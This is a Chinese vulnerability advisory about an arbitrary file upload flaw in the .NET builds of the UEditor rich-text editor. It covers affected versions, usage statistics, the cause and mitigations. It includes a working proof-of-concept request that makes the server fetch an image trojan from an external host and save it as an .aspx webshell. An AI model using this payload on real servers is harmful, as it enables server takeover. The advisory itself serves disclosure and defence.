【漏洞预警】UEditor编辑器任意文件上传可getshell

图片.png


【漏洞预警】UEidtor编辑器任意文件上传可getshell

UEditor是由百度开发的开源富文本编辑器,开源基于BSD协议,小巧灵活,使用简单,有很多web程序在使用UEditor编辑器。该任意文件上传漏洞存在于1.4.3.3和1.5.0版本中,并且只有.NET版本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器。

UEditor下载地址:http://ueditor.baidu.com/website/download.html

分布情况

据不完全统计,下面是全球部分用户使用情况,中国最多,有5000+,美国次之,1000+,其他国家用户比较少:

图片.png

下面是全国部分用户使用情况,浙江842(阿里云?),河南345,北京334,四川206:

图片.png

根据FOFA指纹识别功能,发现有很多重点机构在使用.NET版本的UEditor,包括某些国内甚至世界知名高校。这里为了避免黑客利用进行攻击,不说出具体名字。如果不确定使用的UEditor是否存在漏洞。

漏洞分析

该漏洞是由于上传文件时,使用的CrawlerHandler类未对文件类型进行检验,导致了任意文件上传。1.4.3.3和1.5.0版本利用方式稍有不同,1.4.3.3需要一个能正确解析的域名。而1.5.0用IP和普通域名都可以。

漏洞利用

这里针对1.5.0版本进行测试,需要先在外网服务器上传一个图片木马,比如:1.jpg/1.gif/1.png都可以,下面x.x.x.x是外网服务器地址,source[]参数值改为图片木马地址,并在结尾加上“?.aspx”即可getshell,利用POC:

POST /ueditor/net/controller.ashx?action=catchimage

source%5B%5D=http%3A%2F%2Fx.x.x.x/1.gif?.aspx

POC这里路径需要根据实际情况改变。在官网下载1.5.0受漏洞影响版本并复现:

图片.png

复现成功会返回路径信息,可以看到木马已经成功被传上去了。

防御措施

1.修改CrawlerHandler.cs 增加对文件类型的检测;

2.部署waf等相关安全产品。

更多安全文章可以关注链接:https://nosec.org

免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐